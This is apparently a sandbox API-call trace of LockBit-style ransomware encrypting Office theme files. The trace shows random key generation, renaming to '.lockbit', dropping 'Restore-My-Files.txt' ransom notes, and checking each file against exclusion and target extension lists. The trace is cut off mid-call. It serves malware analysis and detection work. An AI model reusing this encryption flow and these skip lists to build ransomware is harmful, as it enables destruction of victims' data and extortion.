CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\composite.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0187.463] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.463] malloc (_Size=0x40068) returned 0x1ff1e60 [0187.463] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=568653) returned 1 [0187.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0187.464] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0187.464] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0187.466] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.466] malloc (_Size=0xae) returned 0x1fa2ed8 [0187.466] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0187.467] free (_Block=0x1fa2ed8) [0187.467] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Composite.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.467] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.467] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.467] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8607600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a279a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x8607600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1240d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Concourse.thmx", cAlternateFileName="CONCOU~1.THM")) returned 1 [0187.467] lstrcmpiW (lpString1=".", lpString2="Concourse.thmx") returned -1 [0187.467] lstrcmpiW (lpString1="..", lpString2="Concourse.thmx") returned -1 [0187.467] PathFindExtensionW (pszPath="Concourse.thmx") returned=".thmx" [0187.467] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.467] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.467] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.467] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.467] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.467] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.467] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.468] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.468] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Concourse.thmx") returned 1 [0187.469] lstrcmpiW (lpString1="ntldr", lpString2="Concourse.thmx") returned 1 [0187.469] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Concourse.thmx") returned 1 [0187.469] lstrcmpiW (lpString1="bootsect.bak", lpString2="Concourse.thmx") returned -1 [0187.469] lstrcmpiW (lpString1="autorun.inf", lpString2="Concourse.thmx") returned -1 [0187.469] lstrcmpiW (lpString1="thumbs.db", lpString2="Concourse.thmx") returned 1 [0187.469] lstrcmpiW (lpString1="iconcache.db", lpString2="Concourse.thmx") returned 1 [0187.469] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.469] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx") returned=".thmx" [0187.469] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.469] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.469] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.470] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.470] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx.lockbit") returned 76 [0187.470] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\concourse.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0187.477] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.477] malloc (_Size=0x40068) returned 0x3d70450 [0187.477] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=74765) returned 1 [0187.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.477] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.477] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0187.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0187.478] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0187.480] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.480] malloc (_Size=0xae) returned 0x1fa2ed8 [0187.480] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0187.482] free (_Block=0x1fa2ed8) [0187.482] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Concourse.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.482] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.482] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.482] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee59400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a99dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6ee59400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1e92c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Couture.thmx", cAlternateFileName="COUTUR~1.THM")) returned 1 [0187.482] lstrcmpiW (lpString1=".", lpString2="Couture.thmx") returned -1 [0187.482] lstrcmpiW (lpString1="..", lpString2="Couture.thmx") returned -1 [0187.482] PathFindExtensionW (pszPath="Couture.thmx") returned=".thmx" [0187.482] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.482] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.483] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.483] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Couture.thmx") returned 1 [0187.484] lstrcmpiW (lpString1="ntldr", lpString2="Couture.thmx") returned 1 [0187.484] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Couture.thmx") returned 1 [0187.484] lstrcmpiW (lpString1="bootsect.bak", lpString2="Couture.thmx") returned -1 [0187.484] lstrcmpiW (lpString1="autorun.inf", lpString2="Couture.thmx") returned -1 [0187.484] lstrcmpiW (lpString1="thumbs.db", lpString2="Couture.thmx") returned 1 [0187.484] lstrcmpiW (lpString1="iconcache.db", lpString2="Couture.thmx") returned 1 [0187.484] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0187.484] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx") returned=".thmx" [0187.484] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0187.484] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0187.484] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0187.485] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0187.485] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx.lockbit") returned 74 [0187.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\couture.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0187.490] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0187.490] malloc (_Size=0x40068) returned 0x3f70048 [0187.490] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2003652) returned 1 [0187.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0187.491] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0187.491] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0187.491] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0187.491] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0187.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0187.494] malloc (_Size=0xaa) returned 0x1fa2ed8 [0187.495] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0187.496] free (_Block=0x1fa2ed8) [0187.496] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Couture.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0187.496] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0187.496] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0187.496] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73aa4800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a99dc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x73aa4800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x555df, dwReserved0=0x0, dwReserved1=0x0, cFileName="Elemental.thmx", cAlternateFileName="ELEMEN~1.THM")) returned 1 [0187.496] lstrcmpiW (lpString1=".", lpString2="Elemental.thmx") returned -1 [0187.496] lstrcmpiW (lpString1="..", lpString2="Elemental.thmx") returned -1 [0187.496] PathFindExtensionW (pszPath="Elemental.thmx") returned=".thmx" [0187.496] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0187.496] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0187.497] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0187.497] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0187.498] lstrcmpiW 